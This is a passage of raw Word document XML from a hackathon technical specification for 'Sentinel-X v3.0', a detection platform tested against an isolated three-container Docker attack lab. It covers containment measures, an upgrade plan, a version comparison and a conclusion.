          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All three containers operate on an isolated bridge network (172.20.0.0/24) with no external internet routing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker container has no port bindings to the host machine — it cannot reach any network outside the Docker bridge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose down removes the network and all containers completely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Data Containment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The target container's /var/log is shared via a named Docker volume, not a host bind mount — log files never touch the host filesystem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Docker socket mount grants container management privileges; Sentinel-X uses it in read-only mode (events and log streaming only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="BBCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No data from the attack lab persists after docker-compose down --volumes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Responsible Use Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This architecture is explicitly modelled on Hack The Box and DVWA — well-established, legally and ethically accepted platforms for security research and training. The intentionally vulnerable target exists only within the isolated Docker network and poses zero risk to any external system. All attack tools (nmap, hydra, netcat) are standard security assessment utilities used in professional penetration testing engagements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. UPGRADE PATH: v2.1 → v3.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sentinel-X v3.0 is fully backward compatible with v2.1. No existing code is removed or broken. All additions are additive. The upgrade consists of four discrete steps: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000"/>
        <w:gridCol w:w="3300"/>
        <w:gridCol w:w="2520"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Files Changed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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Estimated Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Add containers/ directory with attacker and target Dockerfiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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containers/attacker/Dockerfile, containers/target/Dockerfile, attack_orchestrator.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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2 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Update docker-compose.yml with 3-container topology and shared volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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docker-compose.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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30 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Add container_telemetry_agent.py; update linux_agent.py with target_log_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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agents/ (2 files)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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2 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Add web_path_probe.yaml; tune brute_force.yaml; update correlation engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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detection/rules/ (2 files), correlation/engine.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="252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1.5 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Total estimated upgrade effort: approximately 6 hours. The existing v2.1 test suite (tests/unit/test_sentinel.py) requires no changes — all new functionality is additive and independently testable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11. v2.1 vs v3.0 COMPARISON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Capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="293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v2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2930"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0F2A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00D4FF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">v3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Attack Source</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Replayed CICIDS 2017 dataset + injected synthetic events</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Real Kali Linux tools running live against real Ubuntu target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Log Origin</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Simulated / pre-recorded</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Genuine OS log entries written by real attack tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Demo Command</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python scripts/inject_events.py</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docker exec sentinelx_attacker ./attack_orchestrator.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Infrastructure</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Single container</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Three-container isolated Docker Compose lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Log Ingestion</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Local file or injected queue</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Docker shared volume + Docker socket dual-path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Brute Force Detection</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Works on synthetic PAM entries</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Works on genuine hydra-generated PAM entries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Web Attack Detection</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HTTP log injection</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Real Apache access log entries from curl probing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Attack Correlation</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Individual alerts only</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Full 4-phase attack chain → unified CRITICAL incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="350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Container Response</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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2930"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D1F35" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="BBCCDD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">isolate_container() pauses target via Docker API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="350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Demo Credibility</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Moderate (judges can tell events are synthetic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2930"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="091828" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="BBCCDD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Maximum (every alert triggered by real tool activity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12. SUMMARY &amp; CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sentinel-X v3.0 represents a fundamental shift in how security platform demonstrations work. The move from injected synthetic events to a live three-container Docker lab eliminates the single most credibility-damaging aspect of hackathon security demos: the audience knowing the data is fake.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The architecture follows the same model as professional-grade security training platforms — an isolated network, a deliberately vulnerable target, real attack tools, and a detection engine reading genuine OS logs. Every alert the judge sees on the dashboard during the demo is a real detection event, provably triggered by a real tool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="CCDDEE"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All seven layers of the original SOC stack are preserved, enhanced, and made more demonstrably real. The upgrade path from v2.1 is fully additive with no breaking changes. The total implementation effort is approximately 6 hours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="00D4FF" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="300" w:before="300"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00D4FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">One docker-compose up command. One attack script. Real tools. Real logs. Real detections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1E3A5F" w:sz="4" w:space="8"/>
        </w:pBdr>
        <w:spacing w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="8899AA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SENTINEL-X v3.0  ·  Hack Malenadu '26  ·  Problem Statement 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360"/>
      </w:tabs>
      <w:spacing w:before="80"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="8899AA"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Hack Malenadu '26 — Problem Statement 3  |  Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="8899AA"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>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F" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="00D4FF"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">SENTINEL-X v3.0 </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="8899AA"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">| Real-Attack SOC Platform — Technical Specification</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">	</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FF3B3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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="00D4FF"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="–"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="960" w:hanging="300"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="8899AA"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FF6B35"/>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BBCCD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D4FF" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:spacing w:after="240" w:before="480"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="00D4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FF6B3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A855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2026-04-17T04:56:04.843Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-17T04:56:04.844Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>